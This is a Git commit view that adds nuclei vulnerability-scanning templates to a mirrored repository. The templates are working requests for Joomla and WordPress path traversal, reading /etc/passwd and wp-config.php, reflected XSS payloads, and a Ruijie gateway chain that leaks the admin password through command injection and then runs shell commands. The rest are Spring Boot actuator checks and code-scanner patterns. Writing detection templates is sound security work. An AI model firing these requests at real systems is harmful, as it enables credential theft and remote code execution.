daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #80 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-08-07 11:30:15 +05:30 committed by GitHub
parent b20ba6754d 3cc1386003
commit a992d88550
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
27 changed files with 688 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
cves/2010/CVE-2010-2682.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2014/CVE-2014-5368.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

28
cves/2017/CVE-2017-14651.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2017-14651
info:
name: Reflected XSS - WSO2 Data Analytics Server
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
tags: cve,cve2017,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
- "Failed to add new collection"
part: body
condition: and
- type: word
words:
- "text/html"
part: header

40
cves/2017/CVE-2017-18024.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2017-18024
info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
reference: |
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
description: |
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
tags: cve,cve2017,xss,avantfax
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("{{randstr}}")</script>'
- 'AvantFAX'
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

0
cves/2021/CVE-2021–35336.yaml → cves/2021/CVE-2021-35336.yaml
View File

29
exposures/configs/qdpm-info-leak.yaml Normal file
View File

@ -0,0 +1,29 @@
id: qdpm-info-leak
info:
author: gy741
description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
severity: high
tags: qdpm,exposure
reference: |
- https://www.exploit-db.com/exploits/50176
requests:
- method: GET
path:
- '{{BaseURL}}/core/config/databases.yml'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'dsn:'
- 'username:'
- 'password:'
condition: and
- type: status
status:
- 200

46
exposures/configs/ruijie-eg-password-leak.yaml Normal file
View File

@ -0,0 +1,46 @@
id: ruijie-eg-password-leak
info:
name: Ruijie EG Easy Gateway Password Leak
author: pikpikcu,pdteam
severity: high
description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability
reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
vendor: https://www.ruijienetworks.com
tags: ruijie,exposure
requests:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
username=admin&password=admin?show+webmaster+user
matchers-condition: and
matchers:
- type: word
words:
- '"data":'
- '"status":1'
- 'admin'
condition: and
part: body
- type: word
words:
- 'text/json'
part: header
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- 'admin ([a-zA-Z0-9#@]+)",'

30
exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml Normal file
View File

@ -0,0 +1,30 @@
id: ruijie-nbr1300g-cli-password-leak
info:
name: Ruijie NBR1300G Cli Password Leak
author: pikpikcu
severity: medium
reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
vendor: https://www.ruijienetworks.com
tags: ruijie,exposure
requests:
- raw:
- |
POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Length: 111
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
words:
- "webmaster level 2 username guest password guest"
part: body
- type: status
status:
- 200

2
exposures/configs/symfony-database-config.yaml
View File

@ -4,7 +4,7 @@ info:
name: Symfony Database Configuration Exposure
author: pdteam,geeknik
severity: high
tags: config,exposure
tags: config,exposure,symfony
requests:
- method: GET

2
exposures/configs/symfony-profiler.yaml
View File

@ -4,7 +4,7 @@ info:
name: Symfony Profiler
author: pdteam
severity: high
tags: config,exposure
tags: config,exposure,symfony
requests:
- method: GET

107
file/perl/perl-scanner.yaml Normal file
View File

@ -0,0 +1,107 @@
id: perl-scanner
info:
name: Perl File Scanner
author: geeknik
severity: info
tags: perl,file
file:
- extensions:
- pl # default
- perl # uncommon
- pod # plain old documentation
- pm # perl module
extractors:
- type: regex
# Standard random number generators should not be used to generate randomness used for security reasons. For security sensitive randomness a crytographic randomness generator that provides sufficient entropy should be used.
regex:
- 'srand'
- 'rand'
condition: or
- type: regex
regex:
- 'getc'
- 'readdir'
- 'read'
- 'sysread'
condition: or
- type: regex
# When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely.
regex:
- 'exec'
- type: regex
# The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them.
regex:
- 'fcntl'
- type: regex
# The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice.
regex:
- 'bind'
- type: regex
# When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed.
regex:
- 'setpgrp'
- type: regex
# When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system.
regex:
- 'setpriority'
- type: regex
# Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function.
regex:
- 'syscall'
- type: regex
# The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data.
regex:
- 'connect'
- type: regex
# When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run.
regex:
- 'system'
- type: regex
# The filename argument of open should be carefully checked if it is being created with any user-supplied string as a compontent of it. Strings should be checked for occurences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed.
regex:
- 'open'
- type: regex
# When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value.
regex:
- 'mkdir'
- 'chdir'
- 'rmdir'
- 'chown'
- 'chmod'
- 'link'
- 'symlink'
- 'truncate'
- 'chroot'
- type: regex
# Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe.
regex:
- 'umask'
- type: regex
# Avoid constructing the list of process ids to kill with any strings that contain user inputted data. Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks.
regex:
- 'kill'
- type: regex
# Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways.
regex:
- 'ioctl'
- type: regex
# Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval.
regex:
- 'eval'
- type: regex
# Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns.
regex:
- 'glob'
- type: regex
# Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams.
regex:
- 'fork'
- type: regex
# DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted.
regex:
- 'gethostbyname'
- 'gethostbyaddr'
condition: or

126
file/php/php-scanner.yaml Normal file
View File

@ -0,0 +1,126 @@
id: php-scanner
info:
name: PHP Scanner
author: geeknik
severity: info
tags: php,file
file:
- extensions:
- html
- phtml
- php
- php3
- php4
extractors:
- type: regex
# Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array($user_id));
regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
- type: regex
# Warn when var_dump is found
regex:
- 'var_dump'
- type: regex
# Warn when display_errors is enabled manually
regex:
- 'display_errors'
- type: regex
# Avoid the use of eval()
regex:
- 'eval'
- 'eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))'
condition: or
- type: regex
# Avoid the use of exit or die()
regex:
- 'exit'
- 'die'
condition: or
- type: regex
# Avoid the use of logical operators (ex. using and over &&)
regex:
- 'and'
- type: regex
# Avoid the use of the ereg* functions (now deprecated)
regex:
- 'ereg'
- type: regex
# Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE)
regex:
- 'extract'
- type: regex
# Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options
regex:
- 'echo'
- 'print'
- 'printf'
- 'print_r'
- 'vprintf'
- 'sprintf'
condition: or
- type: regex
# Ensuring you're not using echo with file_get_contents
regex:
- 'file_get_contents'
- type: regex
# Testing for the system execution functions and shell exec (backticks)
regex:
- '\\`'
- type: regex
# Use of readfile, readlink and readgzfile
regex:
- 'readfile'
- 'readlink'
- 'readgzfile'
- type: regex
# Using parse_str or mb_parse_str (writes values to the local scope)
regex:
- 'parse_st'
- 'mb_parse_str'
- type: regex
# Using session_regenerate_id either without a parameter or using false
regex:
- 'session_regenerate'
- type: regex
# Avoid use of $_REQUEST (know where your data is coming from)
regex:
- '\\$_REQUEST'
- type: regex
# Don't use mysql_real_escape_string
regex:
- 'mysql_real_escape_string'
- type: regex
# Avoiding use of import_request_variables
regex:
- 'import_request_variables'
- type: regex
# Avoid use of $GLOBALS
regex:
- '\\$GLOBALS'
- type: regex
regex:
- '\\$_GET'
- type: regex
regex:
- '\\$_POST'
- type: regex
# Ensure the use of type checking validating against booleans (===)
regex:
- '\\=\\=\\='
- type: regex
# Ensure that the /e modifier isn't used in regular expressions (execute)
regex:
- '\\/e'
- type: regex
# Using concatenation in header() calls
regex:
- 'header'
- type: regex
# Avoiding the use of $http_raw_post_data
regex:
- '\\$http_raw_post_data'

28
misconfiguration/springboot/springboot-autoconfig.yaml Normal file
View File

@ -0,0 +1,28 @@
id: springboot-autoconfig
info:
name: Detect Springboot autoconfig Actuator
author: pussycat0x
severity: low
description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied.
tags: springboot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/autoconfig"
- "{{BaseURL}}/actuator/autoconfig"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "positiveMatches"
- "AuditAutoConfiguration#auditListener"
- "EndpointAutoConfiguration#beansEndpoint"
condition: and
- type: status
status:
- 200

2
misconfiguration/springboot/springboot-beans.yaml
View File

@ -5,7 +5,7 @@ info:
author: ajaysenr
severity: low
description: Displays a complete list of all the Spring beans in the application
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

2
misconfiguration/springboot/springboot-configprops.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

31
misconfiguration/springboot/springboot-dump.yaml Normal file
View File

@ -0,0 +1,31 @@
id: springboot-dump
info:
name: Detect Springboot Dump Actuator
author: pussycat0x
severity: low
description: Performs a thread dump
tags: springboot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/dump"
- "{{BaseURL}}/actuator/dump"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "threadName"
- "threadId"
- "waitedTime"
- "lockName"
- "stackTrace"
- "methodName"
condition: and
- type: status
status:
- 200

2
misconfiguration/springboot/springboot-env.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

28
misconfiguration/springboot/springboot-health.yaml Normal file
View File

@ -0,0 +1,28 @@
id: springboot-health
info:
name: Detect Springboot Health Actuator
author: pussycat0x
severity: info
description: Additional routes may be displayed
tags: springboot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/health"
- "{{BaseURL}}/actuator/health"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"status"'
- '"diskSpace"'
- '"jms"'
condition: and
- type: status
status:
- 200

18
misconfiguration/springboot/springboot-heapdump.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET
@ -16,6 +16,7 @@ requests:
max-size: 2097152 # 2MB - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
part: body
binary:
@ -27,18 +28,3 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
part: header
condition: or
- type: dsl
dsl:
- "len(body) >= 100000"
- "content_length >= 100000"
condition: or
part: header

2
misconfiguration/springboot/springboot-httptrace.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

2
misconfiguration/springboot/springboot-loggers.yaml
View File

@ -4,7 +4,7 @@ info:
name: Detect Springboot Loggers
author: that_juan_,dwisiswant0,wdahlenb
severity: low
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

2
misconfiguration/springboot/springboot-mappings.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

32
misconfiguration/springboot/springboot-metrics.yaml Normal file
View File

@ -0,0 +1,32 @@
id: springboot-metrics
info:
name: Detect Springboot metrics Actuator
author: pussycat0x
severity: low
description: Additional routes may be displayed
tags: springboot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
- "{{BaseURL}}/actuator/metrics"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "mem"
- "mem.free"
- "processors"
- "instance.uptime"
- "systemload.average"
- "nonheap.init"
- "heap.committed"
condition: and
- type: status
status:
- 200

2
misconfiguration/springboot/springboot-trace.yaml
View File

@ -5,7 +5,7 @@ info:
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
tags: springboot,exposure
requests:
- method: GET

31
technologies/avantfax-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: avantfax-detect
info:
name: AvantFAX Detect
author: pikpikcu
severity: info
tags: tech,avantfax
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>- AvantFAX - Login</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<p align="center">([0-9.]+)<\/p>'

5
technologies/favicon-detection.yaml
View File

@ -2554,3 +2554,8 @@ requests:
name: "KevinLAB"
dsl:
- "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))"
- type: dsl
name: "qdPM"
dsl:
- "status_code==200 && (\"762074255\" == mmh3(base64_py(body)))"

58
vulnerabilities/other/ruijie-eg-rce.yaml Normal file
View File

@ -0,0 +1,58 @@
id: ruijie-eg-rce
info:
name: Ruijie EG cli.php RCE
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
vendor: https://www.ruijienetworks.com
tags: ruijie,rce
requests:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
username=admin&password=admin?show+webmaster+user
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
username=admin&password={{admin}}
- |
POST /cli.php?a=shell HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 111
notdelay=true&command=cat /etc/passwd
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "nobody:.*:0:0"
part: body
- type: status
status:
- 200
extractors:
- type: regex
name: admin
group: 1
internal: true
regex:
- 'admin ([a-zA-Z0-9#@]+)",'